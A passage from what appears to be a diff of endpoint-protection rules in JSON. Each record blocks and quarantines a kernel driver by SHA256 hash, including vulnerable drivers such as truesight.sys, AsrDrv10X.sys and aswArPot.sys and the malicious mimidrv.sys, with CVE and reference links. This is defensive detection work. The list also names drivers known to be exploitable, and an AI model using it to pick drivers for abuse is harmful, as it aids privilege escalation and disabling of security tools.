+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7831ba304ffc9cb1ff0f70a51a255d03acbb8edd801d61f0e0cb11b32da0384",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "019d4dce-e650-5223-90ad-8cea1af256a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828803Z",
+ "creation_date": "2026-03-23T11:45:31.828805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828810Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3728e8d692093a6111e8c0943e5f11ccff35a6395982dd065c992ac063446cf6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01aa8931-6e43-562b-819d-3e1a96b8e116",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156002Z",
+ "creation_date": "2026-03-23T11:45:31.156004Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156010Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9df4b81a03df605e808e8f819fc913cb00f2076bb55d187bf97b739c151b81f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01b18d44-e9ac-57d3-bcae-bbadb06812dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153560Z",
+ "creation_date": "2026-03-23T11:45:31.153562Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153567Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03172eef01698a6d6eae38c6dcd1b0a9b75f8eb312502dd3b9408b62c553c0d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01b3fb1e-b0ee-5c01-96a3-422380933ded",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470669Z",
+ "creation_date": "2026-03-23T11:45:30.470672Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470681Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b5590995c6bcd39884dceda1e87e8516a3767bce00519ce140a46f1a77666ff",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01ca129a-4d80-51e6-b27c-8cf288301005",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148757Z",
+ "creation_date": "2026-03-23T11:45:31.148759Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148764Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1170f7dfb5b27022f61c7e56fa74729f4c8721e1740f27f6ed3880a7fe277f0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01d01c70-29b8-555d-b27c-309ad5221a06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155031Z",
+ "creation_date": "2026-03-23T11:45:31.155033Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b80d5bc658ec972223838494373244cdbc1e295b6ae48918ce9ac354d035ba4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01d78120-0275-533e-a3d3-ca926cc43d6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143006Z",
+ "creation_date": "2026-03-23T11:45:32.143008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39f5d351878f7216a69d0330c40e5b2793c6d4d3ee72f0673cf7555ea9dbe86a",
+ "comment": "Vulnerable TfSysMon driver from ThreatFire System Monitor (2013) (aka TfSysMon.sys) [https://github.com/BlackSnufkin/BYOVD/tree/main/TfSysMon-Killer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01dbefe3-b15d-5b38-8d1c-535f2fd850d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469101Z",
+ "creation_date": "2026-03-23T11:45:30.469105Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e3e09583b7bba35ef21419bdc711984e8541eb20a29406940727f73cbb5064a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01dc7e0f-5b7c-5791-b9e9-2733c16e6ddb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613478Z",
+ "creation_date": "2026-03-23T11:45:29.613480Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613485Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6bf2460e023b1005cc60e107b14a3cfdf9284cc378a086d92e5dcdf6e432e2c",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01fbb11e-4043-5052-b7c2-7563b0896683",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978860Z",
+ "creation_date": "2026-03-23T11:45:29.978862Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978867Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93b266f38c3c3eaab475d81597abbd7cc07943035068bb6fd670dbbe15de0131",
+ "comment": "Vulnerable Kernel Driver (aka LgCoreTemp.sys) [https://www.loldrivers.io/drivers/2c3884d3-9e4f-4519-b18b-0969612621bc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02070751-a8b3-5e7f-8262-7d5d55529ecc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471133Z",
+ "creation_date": "2026-03-23T11:45:30.471136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6f7acc48d15f334a757a416809eb596d291952cf730a281de4a4423e18dce76",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "020827c1-7773-5550-9c17-86004207bb8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473310Z",
+ "creation_date": "2026-03-23T11:45:30.473313Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0484defcf1b5afbe573472753dc2395e528608b688e5c7d1d178164e48e7bed7",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0210c95b-1775-5ff8-ade4-b5221e50bc71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157580Z",
+ "creation_date": "2026-03-23T11:45:31.157585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d0c587c704e2ca6feb8626df7817187f319e4677b393bf0b92386b2ac400e29",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02128104-2530-560b-83b0-e6fcc4812cf3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973375Z",
+ "creation_date": "2026-03-23T11:45:29.973377Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973382Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57ae8d2d962cdde554831415725583fcf4ae5fc844c19983a7c37e31b12109a3",
+ "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "021a40bf-7f63-5a68-8d55-86b3fe0a68e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480112Z",
+ "creation_date": "2026-03-23T11:45:31.480116Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "936af11604944176e2ca24f03dd7383f55f2f24a228de72744f2896ac50432ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "021d2917-c36e-573c-aade-197dc442e200",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486042Z",
+ "creation_date": "2026-03-23T11:45:31.486046Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f740ededb186a18cc8a6a315a796c73520e48bfbd282d48a734d37e0f2aa295",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "021fbfcf-9010-59e4-b386-b51716734a39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834053Z",
+ "creation_date": "2026-03-23T11:45:30.834057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834064Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21b21459993d49b83a44f5dfaa1817f7fada9ae1382b3156b79a10145bb9530a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0225663b-6c52-562c-8485-8dabfe50a324",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968511Z",
+ "creation_date": "2026-03-23T11:45:29.968513Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14adbf0bc43414a7700e5403100cff7fc6ade50bebfab16a17acf2fdda5a9da8",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02267224-bcf4-5f48-9cc3-fa2668249be7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830341Z",
+ "creation_date": "2026-03-23T11:45:31.830343Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6dc7053d15b5c6bf57f53531263e135fbc064237ce2ae163a3072acb89dbf9b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "022687b1-6e32-5eb5-99a0-caeaef5ed5e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156292Z",
+ "creation_date": "2026-03-23T11:45:31.156293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156299Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb7775fe2b3c6a82fb5308238b99412e1b8e11c6a48a03f7fed8fb31f5e9b2e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "022ed932-0fd1-5208-9fd8-629ab48b4ad3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459850Z",
+ "creation_date": "2026-03-23T11:45:30.459853Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bbf564a02784d53b8006333406807c3539ee4a594585b1f3713325904cb730ec",
+ "comment": "Vulnerable Kernel Driver (aka VBoxMouseNT.sys) [https://www.loldrivers.io/drivers/ecabc507-2cc7-4011-89ab-7d9d659e6f88/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0237524e-2deb-5599-a51e-38fdbafa6c0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823123Z",
+ "creation_date": "2026-03-23T11:45:30.823125Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823131Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c25cb17f5879e9c2fb4c91adb18e24b50a94738d5deb62a4189065bcf2c1d86b",
+ "comment": "Vulnerable Kernel Driver (aka atlAccess.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
